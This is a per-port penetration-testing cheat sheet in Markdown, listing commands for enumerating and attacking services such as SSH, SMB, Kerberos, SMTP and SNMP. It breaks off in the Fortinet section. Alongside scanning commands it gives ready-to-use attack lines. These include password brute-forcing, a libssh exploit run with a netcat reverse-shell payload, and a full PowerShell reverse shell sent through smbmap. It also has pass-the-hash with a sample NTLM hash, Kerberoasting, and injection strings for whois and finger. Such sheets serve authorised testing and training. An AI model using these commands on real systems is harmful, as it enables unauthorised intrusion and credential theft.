# Ports ## General AIO [Penetration Testing Methodology - 0DAYsecurity.com](http://0daysecurity.com/penetration-testing/enumeration.html) ## Port 21 - FTP ```bash nmap --script ftp-* -p 21 10.11.1.111 ``` ## Port 22 - SSH * If you have usernames test login with username:username * Vulnerable Versions to user enum: <7.7 ```bash # Enum SSH # Get version nmap 10.11.1.1 -p22 -sV # Get banner nc 10.11.1.1 22 # Get login banner ssh root@10.11.11.1 # Get algorythms supporteed nmap -p22 10.11.1.1 --script ssh2-enum-algos # Check weak keys nmap-p22 10.2.1.1 --script ssh-hostkey --script-args ssh_hostkey=full # Check auth methods nmap -p22 10.11.1.1 --script ssh-auth-methods --script-args="ssh.user=admin" # User can ask to execute a command right after authentication before it’s default command or shell is executed $ ssh -v user@10.10.1.111 id ... Password: debug1: Authentication succeeded (keyboard-interactive). Authenticated to 10.10.1.111 ([10.10.1.1114]:22). debug1: channel 0: new [client-session] debug1: Requesting no-more-sessions@openssh.com debug1: Entering interactive session. debug1: pledge: network debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0 debug1: Sending command: id debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0 uid=1000(user) gid=100(users) groups=100(users) debug1: channel 0: free: client-session, nchannels 1 Transferred: sent 2412, received 2480 bytes, in 0.1 seconds Bytes per second: sent 43133.4, received 44349.5 debug1: Exit status 0 # Check Auth Methods: $ ssh -v 10.10.1.111 OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019 ... debug1: Authentications that can continue: publickey,password,keyboard-interactive # Force Auth Method: $ ssh -v 10.10.1.111 -o PreferredAuthentications=password ... debug1: Next authentication method: password # BruteForce: patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.' hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111 medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111 # LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access # Id python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id # Reverse python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f" # SSH FUZZ # https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt # cpan Net::SSH2 ./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user use auxiliary/fuzzers/ssh/ssh_version_2 # SSH-AUDIT # https://github.com/arthepsy/ssh-audit # Enum users < 7.7: # https://www.exploit-db.com/exploits/45233 https://github.com/CaioCGH/EP4-redes/blob/master/attacker/sshUsernameEnumExploit.py python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a" # SSH Leaks: https://shhgit.darkport.co.uk/ # SSH bruteforce # https://github.com/kitabisa/ssb ``` ## Port 23 - Telnet ```bash # Get banner telnet 10.11.1.110 # Bruteforce password patator telnet_login host=10.11.1.110 inputs='FILE0\nFILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re='Username: | Password:' ``` ## Port 25 - SMTP ```bash nc -nvv 10.11.1.111 25 HELO foo telnet 10.11.1.111 25 VRFY root nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.111 smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.111 # SMTP relay msfconsole use auxiliary/scanner/smtp/smtp_relay set RHOSTS set MAILFROM set MAILTO run # Send email unauth: MAIL FROM:admin@admin.com RCPT TO:DestinationEmail@DestinationDomain.com DATA test . Receive: 250 OK ``` ## Port 43 - Whois ```bash whois -h 10.10.1.111 -p 43 "domain.com" echo "domain.com" | nc -vn 10.10.1.111 43 whois -h 10.10.1.111 -p 43 "a') or 1=1#" ``` ## Port 53 - DNS ```bash # Transfer zone dig AXFR domain.com @10.10.10.10 # dig +multi AXFR @ns1.insecuredns.com insecuredns.com dnsrecon -t axfr -d domain fierce -dns domain.com ``` ## Port 69 - UDP - TFTP * Vulns tftp in server 1.3, 1.4, 1.9, 2.1, and a few more. * Same checks as FTP Port 21. ```bash nmap -p69 --script=tftp-enum.nse 10.11.1.111 ``` ## Port 79 - Finger ```bash nc -vn 10.11.1.111 79 echo "root" | nc -vn 10.11.1.111 79 # User enumeration finger @10.11.1.111 #List users finger admin@10.11.1.111 #Get info of user finger user@10.11.1.111 #Get info of user finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Port 88 - Kerberos Check [Kerberos dedicated](/post-exploitation/windows/ad/kerberos-attacks.md) section ```bash nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP use auxiliary/gather/kerberos_enumusers # MSF # Check for Kerberoasting: GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip -format hashcat/john # GetUserSPNs ASREPRoast: impacket-GetUserSPNs /: -request -format -outputfile impacket-GetUserSPNs / -usersfile -format -outputfile # Kerberoasting: impacket-GetUserSPNs /: -outputfile # Overpass The Hash/Pass The Key (PTK): python3 getTGT.py / -hashes [lm_hash]: python3 getTGT.py / -aesKey python3 getTGT.py /:[password] # Using TGT key to excute remote commands from the following impacket scripts: python3 psexec.py /@ -k -no-pass python3 smbexec.py /@ -k -no-pass python3 wmiexec.py /@ -k -no-pass # https://www.tarlogic.com/blog/como-funciona-kerberos/ # https://www.tarlogic.com/blog/como-atacar-kerberos/ python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt # https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/ # https://github.com/GhostPack/Rubeus # https://github.com/fireeye/SSSDKCMExtractor # https://gitlab.com/Zer1t0/cerbero ``` ## Port 110 - Pop3 ```bash telnet 10.11.1.111 USER pelle@10.11.1.111 PASS admin # or: USER pelle PASS admin # List all emails list # Retrieve email number 5, for example retr 9 ``` ## Port 111 - Rpcbind ```bash rpcinfo -p 10.11.1.111 rpcclient -U "" 10.11.1.111 srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall ``` ## Port 135 - MSRPC Some versions are vulnerable. ```bash nmap 10.11.1.111 --script=msrpc-enum msf > use exploit/windows/dcerpc/ms03_026_dcom # Endpoint Mapper Service Discovery use auxiliary/scanner/dcerpc/endpoint_mapper #Hidden DCERPC Service Discovery use auxiliary/scanner/dcerpc/hidden # Remote Management Interface Discovery use auxiliary/scanner/dcerpc/management # DCERPC TCP Service Auditor use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor impacket-rpcdump # Enum network interface # https://github.com/mubix/IOXIDResolver ``` | Named pipe | Description | Service or process | Interface identifier | | ---------- | ----------- | ------------------ | -------------------- | | atsvc | [atsvc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_scheduler.html) interface (Scheduler service) | mstask.exe | 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 | | ----- | -------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------- | ----------------------------------------- | | AudioSrv | [AudioSrv](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_audio.html) interface (Windows Audio service) | AudioSrv | 3faf4738-3a21-4307-b46c-fdda9bb8c0d5 v1.0 | | -------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ----------------------------------------- | | browser (ntsvcs alias) | [browser](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_browser.html) interface (Computer Browser service) | Browser | 6bffd098-a112-3610-9833-012892020162 v0.0 | | ---------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------- | ----------------------------------------- | | cert | [ICertPassage](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_certsrv.html) interface (Certificate services) | certsrv.exe | 91ae6020-9e3c-11cf-8d7c-00aa00c091be v0.0 | | ---- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------- | ----------------------------------------- | | Ctx\_Winstation\_API\_Service | [winstation\_rpc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_termsrv.html) interface | termsrv.exe | 5ca4a760-ebb1-11cf-8611-00a0245420ed v1.0 | | ----------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------- | ----------- | ----------------------------------------- | | DAV RPC SERVICE | [davclntrpc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_davclntrpc.html) interface (WebDAV client service) | WebClient | c8cb7687-e6d3-11d2-a958-00c04f682e16 v1.0 | | --------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------- | ----------------------------------------- | | dnsserver | [DnsServer](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_dns.html) interface (DNS Server service) | dns.exe | 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 | | --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------- | ------- | ----------------------------------------- | | epmapper | [epmp](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/rpcss_msrpc_interfaces.html) interface (RPC endpoint mapper) | RpcSs | e1af8308-5d1f-11c9-91a4-08002b14a0fa v3.0 | | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----- | ----------------------------------------- | | eventlog (ntsvcs alias) | [eventlog](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_eventlog.html) interface (Eventlog service) | Eventlog | 82273fdc-e32a-18c3-3f78-827929dc23ea v0.0 | | ----------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ----------------------------------------- | | HydraLsPipe | Terminal Server Licensing | lserver.exe | 3d267954-eeb7-11d1-b94e-00c04fa3080d v1.0 | | ----------- | ------------------------- | ----------- | ----------------------------------------- | | InitShutdown | [InitShutdown](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winlogon_w2k.html) interface | winlogon.exe | 894de0c0-0d55-11d3-a322-00c04fa321a1 v1.0 | | ------------ | ---------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | ----------------------------------------- | | keysvc | [IKeySvc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_cryptsvc.html) interface (Cryptographic services) | CryptSvc | 8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0 | | ------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ----------------------------------------- | | keysvc | [ICertProtect](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_cryptsvc.html) interface (Cryptographic services) | CryptSvc | 0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0 | | ------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ----------------------------------------- | | locator | [NsiS](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_locator.html) interface (RPC Locator service) | locator.exe | d6d70ef0-0e3b-11cb-acc3-08002b1d29c4 v1.0 | | ------- | ------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------- | ----------------------------------------- | | llsrpc | [llsrpc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_llsrpc.html) interface (Licensing Logging service) | llssrv.exe | 342cfd40-3c6c-11ce-a893-08002b2e9c6d v0.0 | | ------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------- | ----------------------------------------- | | lsarpc (lsass alias) | [lsarpc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_lsarpc.html) interface | lsass.exe | 12345778-1234-abcd-ef00-0123456789ab v0.0 | | -------------------- | ---------------------------------------------------------------------------------------------------------------------------------- | --------- | ----------------------------------------- | | lsarpc (lsass alias) | [dssetup](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_dssetup.html) interface | lsass.exe | 3919286a-b10c-11d0-9ba8-00c04fd92ef5 v0.0 | | -------------------- | ------------------------------------------------------------------------------------------------------------------------------------ | --------- | ----------------------------------------- | | msgsvc (ntsvcs alias) | [msgsvcsend](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msgsvc.html) interface (Messenger service) | messenger | 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 | | --------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | ----------------------------------------- | | nddeapi | [nddeapi](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_nddeapi.html) interface (NetDDE service) | netdde.exe | 2f5f3220-c126-1076-b549-074d078619da v1.2 | | ------- | ----------------------------------------------------------------------------------------------------------------------------------------------------- | ---------- | ----------------------------------------- | | netdfs | [netdfs](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_netdfs.html) interface (Distributed File System service) | Dfssvc | 4fc742e0-4a10-11cf-8273-00aa004ae673 v3.0 | | ------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------ | ----------------------------------------- | | netlogon (lsass alias) | [netlogon](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_netlogon.html) interface (Net Logon service) | Netlogon | 12345678-1234-abcd-ef00-01234567cffb v1.0 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ----------------------------------------- | | ntsvcs | [pnp](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_pnp.html) interface (Plug and Play service) | PlugPlay | 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0 | | ------ | ---------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ----------------------------------------- | | plugplay | [pnp](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_pnp.html) interface (Plug and Play Windows Vista service) | PlugPlay | 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0 | | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -------- | ----------------------------------------- | | policyagent | [PolicyAgent](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_ipsec_w2k.html) interface (IPSEC Policy Agent (Windows 2000)) | PolicyAgent | d335b8f6-cb31-11d0-b0f9-006097ba4e54 v1.5 | | ----------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ----------- | ----------------------------------------- | | ipsec | [winipsec](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winipsec.html) interface (IPsec Services) | PolicyAgent | 12345678-1234-abcd-ef00-0123456789ab v1.0 | | ----- | ------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------- | ----------------------------------------- | | ProfMapApi | [pmapapi](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winlogon_w2k.html) interface | winlogon.exe | 369ce4f0-0fdc-11d3-bde8-00c04f8eee78 v1.0 | | ---------- | ----------------------------------------------------------------------------------------------------------------------------------------- | ------------ | ----------------------------------------- | | protected\_storage | [IPStoreProv](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_protected_storage.html) interface (Protected Storage) | lsass.exe | c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0 | | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | ----------------------------------------- | | ROUTER | Remote Access | mprdim.dll | 8f09f000-b7ed-11ce-bbd2-00001a181cad v0.0 | | ------ | ------------- | ---------- | ----------------------------------------- | | samr (lsass alias) | [samr](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_samr.html) interface | lsass.exe | 12345778-1234-abcd-ef00-0123456789ac v1.0 | | ------------------ | ------------------------------------------------------------------------------------------------------------------------------ | --------- | ----------------------------------------- | | scerpc | [SceSvc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_sce.html) | services.exe | 93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0 | | ------ | --------------------------------------------------------------------------------------------------------------------- | ------------ | ----------------------------------------- | | SECLOGON | [ISeclogon](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_seclogon.html) interface (Secondary logon service) | seclogon | 12b81e99-f207-4a4c-85d3-77b42f76fd14 v1.0 | | -------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ----------------------------------------- | | SfcApi | [sfcapi](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_sfcapi.html) interface (Windows File Protection) | winlogon.exe | 83da7c00-e84f-11d2-9807-00c04f8ec850 v2.0 | | ------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------------ | ----------------------------------------- | | spoolss | [spoolss](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_spoolss.html) interface (Spooler service) | spoolsv.exe | 12345678-1234-abcd-ef00-0123456789ab v1.0 | | ------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ | ----------- | ----------------------------------------- | | srvsvc (ntsvcs alias) | [srvsvc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.html) interface (Server service) | services.exe (w2k) or svchost.exe (wxp and w2k3) | 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0 | | --------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------ | ----------------------------------------- | | ssdpsrv | [ssdpsrv](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_ssdpsrv.html) interface (SSDP service) | ssdpsrv | 4b112204-0e19-11d3-b42b-0000f81feb9f v1.0 | | ------- | --------------------------------------------------------------------------------------------------------------------------------------------------- | ------- | ----------------------------------------- | | svcctl (ntsvcs alias) | [svcctl](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_svcctl.html) interface (Services control manager) | services.exe | 367aeb81-9844-35f1-ad32-98f038001003 v2.0 | | --------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | ----------------------------------------- | | tapsrv | [tapsrv](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_tapsrv.html) interface (Telephony service) | Tapisrv | 2f5f6520-ca46-1067-b319-00dd010662da v1.0 | | ------ | ------------------------------------------------------------------------------------------------------------------------------------------------------ | ------- | ----------------------------------------- | | trkwks | [trkwks](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_trkwks.html) interface (Distributed Link Tracking Client) | Trkwks | 300f3532-38cc-11d0-a3f0-0020af6b0add v1.2 | | ------ | --------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------ | ----------------------------------------- | | W32TIME (ntsvcs alias) | [w32time](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_w32time.html) interface (Windows Time (Windows 2000 and XP)) | w32time | 8fb6d884-2388-11d0-8c35-00c04fda2795 v4.1 | | ---------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------- | ----------------------------------------- | | W32TIME\_ALT | [w32time](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_w32time.html) interface (Windows Time (Windows Server 2003, Windows Vista)) | w32time | 8fb6d884-2388-11d0-8c35-00c04fda2795 v4.1 | | ------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------- | ----------------------------------------- | | winlogonrpc | [GetUserToken](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winlogon_w2k.html) interface | winlogon.exe | a002b3a0-c9b7-11d1-ae88-0080c75e4ec1 v1.0 | | ----------- | ---------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | ----------------------------------------- | | winreg | [winreg](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winreg.html) interface (Remote registry service) | RemoteRegistry | 338cd001-2244-31f1-aaaa-900038001003 v1.0 | | ------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | -------------- | ----------------------------------------- | | winspipe | [winsif](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winsif.html) interface (WINS service) | wins.exe | 45f52c28-7f9f-101a-b52b-08002b2efabe v1.0 | | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ----------------------------------------- | | wkssvc (ntsvcs alias) | [wkssvc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_wkssvc.html) interface (Workstation service) | services.exe (w2k) or svchost.exe (wxp and w2k3) | 6bffd098-a112-3610-9833-46c3f87e345a v1.0 | | --------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------ | ----------------------------------------- | ## Port 139/445 - SMB ```bash # Enum hostname enum4linux -n 10.11.1.111 nmblookup -A 10.11.1.111 nmap --script=smb-enum* --script-args=unsafe=1 -T5 10.11.1.111 # Get Version smbver.sh 10.11.1.111 Msfconsole;use scanner/smb/smb_version ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' smbclient -L \\\\10.11.1.111 # Get Shares smbmap -H 10.11.1.111 -R echo exit | smbclient -L \\\\10.11.1.111 smbclient \\\\10.11.1.111\\ smbclient -L //10.11.1.111 -N nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111 smbclient -L \\\\10.11.1.111\\ # If got error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED" smbclient -L //10.11.1.111/ --option='client min protocol=NT1' # Check null sessions smbmap -H 10.11.1.111 rpcclient -U "" -N 10.11.1.111 smbclient //10.11.1.111/IPC$ -N # Exploit null sessions enum -s 10.11.1.111 enum -U 10.11.1.111 enum -P 10.11.1.111 enum4linux -a 10.11.1.111 #https://github.com/cddmp/enum4linux-ng/ enum4linux-ng.py 10.11.1.111 -A -C /usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111 # Connect to username shares smbclient //10.11.1.111/share -U username # Connect to share anonymously smbclient \\\\10.11.1.111\\ smbclient //10.11.1.111/ smbclient //10.11.1.111/ smbclient //10.11.1.111/<""share name""> rpcclient -U " " 10.11.1.111 rpcclient -U " " -N 10.11.1.111 # Check vulns nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111 # Multi exploits msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run # Bruteforce login medusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111 -vvvv nmap –script smb-brute 10.11.1.111 # nmap smb enum & vuln nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111 nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111 # Mount smb volume linux mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share # rpcclient commands rpcclient -U "" 10.11.1.111 srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall # Run cmd over smb from linux winexe -U username //10.11.1.111 "cmd.exe" --system # smbmap smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE smbmap.py -H 10.11.1.111 -u username -p 'P@$$w0rd1234!' -L # Drive Listing smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell # Check \Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt " # CrackMapExec crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local --lsa # Impacket python3 samdump.py SMB 172.21.0.0 # Check for systems with SMB Signing not enabled python3 RunFinger.py -i 172.21.0.0/24 ``` ## Port 161/162 UDP - SNMP ```bash nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111 nmap 10.11.1.111 -Pn -sU -p 161 --script=snmp-brute,snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-ios-config,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users snmp-check 10.11.1.111 -c public|private|community snmpwalk -c public -v1 ipaddress 1 snmpwalk -c private -v1 ipaddress 1 snmpwalk -c manager -v1 ipaddress 1 onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X # Impacket python3 samdump.py SNMP 172.21.0.0 # MSF aux modules auxiliary/scanner/misc/oki_scanner auxiliary/scanner/snmp/aix_version auxiliary/scanner/snmp/arris_dg950 auxiliary/scanner/snmp/brocade_enumhash auxiliary/scanner/snmp/cisco_config_tftp auxiliary/scanner/snmp/cisco_upload_file auxiliary/scanner/snmp/cnpilot_r_snmp_loot auxiliary/scanner/snmp/epmp1000_snmp_loot auxiliary/scanner/snmp/netopia_enum auxiliary/scanner/snmp/sbg6580_enum auxiliary/scanner/snmp/snmp_enum auxiliary/scanner/snmp/snmp_enum_hp_laserjet auxiliary/scanner/snmp/snmp_enumshares auxiliary/scanner/snmp/snmp_enumusers auxiliary/scanner/snmp/snmp_login ``` ## Port 389,636 - LDAP Check [AD](/post-exploitation/windows/ad.md) section and this [LDAP](https://malicious.link/post/2022/ldapsearch-reference/) guide ```bash jxplorer ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com" python3 windapsearch.py --dc-ip 10.10.10.182 --users --full > windapsearch_users.txt cat windapsearch_users.txt | grep sAMAccountName | cut -d " " -f 2 > users.txt # Check # https://github.com/ropnop/go-windapsearch ``` ## Port 443 - HTTPS Read the actual SSL CERT to: * find out potential correct vhost to GET * is the clock skewed * any names that could be usernames for bruteforce/guessing. ```bash ./testssl.sh -e -E -f -p -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html # Check for mod_ssl,OpenSSL version Openfuck ``` ## Port 500 - ISAKMP IKE ``` ike-scan 10.11.1.111 ``` ## Port 513 - Rlogin ``` apt install rsh-client rlogin -l root 10.11.1.111 ``` ## Port 541 - FortiNet SSLVPN [Fortinet Ports Guide](https://help.fortinet.com/fos50hlp/54/Content/FortiOS/fortigate-ports-and-protocols-54/Images/FortiGate.png) [SSL VPN 